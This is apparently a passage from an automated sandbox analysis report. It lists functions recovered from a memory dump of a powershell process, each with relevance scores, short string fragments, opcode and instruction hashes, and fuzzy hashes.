                                                                                  • Snapshot File: hcaresult_6_2_7a50000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4'jq$tPjq$$jq$$jq$$jq
                                                                                  • API String ID: 0-728028659
                                                                                  • Opcode ID: c4e03068786e1ea301917fd4299ec72c27f16a28c53f511bdac8d79290a1c8a1
                                                                                  • Instruction ID: 582d9c66bbe8f04bf3055948a5b5195edc05f4f3a5b6e41d7d7c8624b24e3706
                                                                                  • Opcode Fuzzy Hash: c4e03068786e1ea301917fd4299ec72c27f16a28c53f511bdac8d79290a1c8a1
                                                                                  • Instruction Fuzzy Hash: C84138B0A04209EFDB268F44C540BB5B7B3EF86310F08C1AAED259F291C735C941CBA1
                                                                                  Function 07A5A570 Relevance: 6.4, Strings: 5, Instructions: 115COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2411371365.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7a50000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 84jl$XRoq$XRoq$tPjq$$jq
                                                                                  • API String ID: 0-1503762729
                                                                                  • Opcode ID: f4a7084183737b6d85a78ba0bde39f980a76d1e07b288e92b8ae39727eeb2ac3
                                                                                  • Instruction ID: 2583bf6141db96a51db6cc4fd3cf6f433b4dee7ccadfbc2b82e8753bc94566b9
                                                                                  • Opcode Fuzzy Hash: f4a7084183737b6d85a78ba0bde39f980a76d1e07b288e92b8ae39727eeb2ac3
                                                                                  • Instruction Fuzzy Hash: 79416FB5B00205DFCB24CF59C144AAABBF2AF85311F19C26AEC25AB651C771DD81CFA1
                                                                                  Function 07A522F0 Relevance: 6.3, Strings: 5, Instructions: 79COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2411371365.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7a50000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4'jq$$jq$$jq$$jq$$jq
                                                                                  • API String ID: 0-651010669
                                                                                  • Opcode ID: ef9a4f592a8a7e3184c2b474abffe5b920152627aa1261f5205c8874e60a1210
                                                                                  • Instruction ID: 1b211a74a4448b02e00e3e4dcb4e38ee9d93f0a2329ab192bc30cef24601a3b3
                                                                                  • Opcode Fuzzy Hash: ef9a4f592a8a7e3184c2b474abffe5b920152627aa1261f5205c8874e60a1210
                                                                                  • Instruction Fuzzy Hash: DD2189F1610216EFDB388F06C580B76B7B9BF82661F19407AED349B2D1C771C880C6A1
                                                                                  Function 07A5E330 Relevance: 6.3, Strings: 5, Instructions: 77COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2411371365.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7a50000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: tPjq$$jq$$jq$$jq$$jq
                                                                                  • API String ID: 0-2650090061
                                                                                  • Opcode ID: ac6eb7d3e0d3dd4af592557c7dfcd2478756ac3ca671aa861e77308bfe37a188
                                                                                  • Instruction ID: 193e591c3165eebfba1d6773c908787d00ca72d7a831f2f2cec07b601de0c2d9
                                                                                  • Opcode Fuzzy Hash: ac6eb7d3e0d3dd4af592557c7dfcd2478756ac3ca671aa861e77308bfe37a188
                                                                                  • Instruction Fuzzy Hash: 482125F2618216DFDB288F55C54096ABBB4EF95A21F18416AEC20AF391C731DE40C7A1
                                                                                  Function 07A500F0 Relevance: 6.3, Strings: 5, Instructions: 71COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2411371365.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7a50000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $jq$$jq$$jq$bl$bl
                                                                                  • API String ID: 0-2622395122
                                                                                  • Opcode ID: 3da36016c9a093e758d2521a27c31d04532e17a9a972df36e3e666f67dc33e47
                                                                                  • Instruction ID: 0f6950f546d420bf2f9998d436dea347839fa4115e346b2ba52350607161596e
                                                                                  • Opcode Fuzzy Hash: 3da36016c9a093e758d2521a27c31d04532e17a9a972df36e3e666f67dc33e47
                                                                                  • Instruction Fuzzy Hash: C91138713403069FEB244A3AD800767B7ABFFC1761F28802AEC598B391EA35C840C752
                                                                                  Function 07A5D630 Relevance: 5.4, Strings: 4, Instructions: 393COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2411371365.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7a50000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (fll$(fll$(fll$(fll
                                                                                  • API String ID: 0-2347424031
                                                                                  • Opcode ID: 6522ef0b28bc5d2eb1b402edeaffb772eabf7e4575d4a37446528227139567cc
                                                                                  • Instruction ID: b119ec5aa6b1472bdb83dce93729a82543c9489a579c077bf51704be91e4fb50
                                                                                  • Opcode Fuzzy Hash: 6522ef0b28bc5d2eb1b402edeaffb772eabf7e4575d4a37446528227139567cc
                                                                                  • Instruction Fuzzy Hash: 3CF170B4B00205DFD714CF98C580AAAB7B2EFC9714F148569DC25AB754CB32EC42CBA6
                                                                                  Function 07A57670 Relevance: 5.2, Strings: 4, Instructions: 192COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2411371365.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7a50000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (fll$(fll$(fll$(fll
                                                                                  • API String ID: 0-2347424031
                                                                                  • Opcode ID: 774857eb928a84af8d2de0c7330d343fff13e9bfe4e3bd4b63d0497470d91e02
                                                                                  • Instruction ID: 40dd80e466b7b8ce8b99806700c57f2acc89acf3c2280b70ee3b5fea5ba68da1
                                                                                  • Opcode Fuzzy Hash: 774857eb928a84af8d2de0c7330d343fff13e9bfe4e3bd4b63d0497470d91e02
                                                                                  • Instruction Fuzzy Hash: F1717AB4B00205DFD714DF68C550AAABBB3EF88310F148169D815BB755CB76E881CFA6
                                                                                  Function 07A50CB8 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2411371365.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7a50000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $jq$$jq$$jq$$jq
                                                                                  • API String ID: 0-2428501249
                                                                                  • Opcode ID: 45ab4dfcad4efcd6a7e3bc8683f2deee61bd145ce8e1ea3df36fc5a1f5ac64ae
                                                                                  • Instruction ID: 4aadc01cff800d3b97c8eabab53423305e3a1f3f025ac51269f1dd833cdda392
                                                                                  • Opcode Fuzzy Hash: 45ab4dfcad4efcd6a7e3bc8683f2deee61bd145ce8e1ea3df36fc5a1f5ac64ae
                                                                                  • Instruction Fuzzy Hash: 942137B23552065FEB249A3988507737BA6EFC2711F24842AED16CB381DD76D8408371
                                                                                  Function 07A51748 Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2411371365.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7a50000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4'jq$4'jq$$jq$$jq
                                                                                  • API String ID: 0-1496060811
                                                                                  • Opcode ID: afbb6d3291cbe5d72d5236ed18ab7f20a359aa8383df648494ba658fd30347ce
                                                                                  • Instruction ID: 5384183b49cd00b2f47ee518ef41a07434cb419bc4fdd76ac4c3df0b22cd61f7
                                                                                  • Opcode Fuzzy Hash: afbb6d3291cbe5d72d5236ed18ab7f20a359aa8383df648494ba658fd30347ce
                                                                                  • Instruction Fuzzy Hash: 79012B607493964FC32B062C58202F6AFB7DFC355072941ABCC50DF287CD294D468BB6